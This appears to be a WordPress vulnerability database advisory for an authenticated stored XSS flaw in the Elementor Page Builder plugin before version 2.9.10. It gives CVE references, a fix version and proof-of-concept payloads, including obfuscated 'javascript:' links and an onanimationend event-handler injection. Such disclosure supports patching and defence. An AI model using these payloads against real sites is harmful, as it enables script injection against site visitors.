Elementor Page Builder < 2.9.10 - Authenticated Stored XSS



Description
The Elementor Page Builder plugin is susceptible to stored XSS. An author user can create custom links containing XSS payloads or apply custom attributes to widgets which results in XSS.
Proof of Concept
javascript:alert(1), JaVaScript:alert(1), javas	cript:alert(1)

<style>@keyframes x{}</style><div style="animation-name:x" onanimationend="alert(1)"></div>

Affects Plugin

fixed in version 2.9.10

References

CVE 2020-13864
CVE 2020-13865
URL https://www.softwaresecured.com/elementor-page-builder-stored-xss/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Jeremy Buis
Submitter Jeremy Buis
Submitter Twitter jeremybuis
Views 4116
Verified No
WPVDB ID 10256

Timeline

Publicly Published 2020-06-05 (about 1 month ago)
Added 2020-06-05 (about 1 month ago)
Last Updated 2020-06-06 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin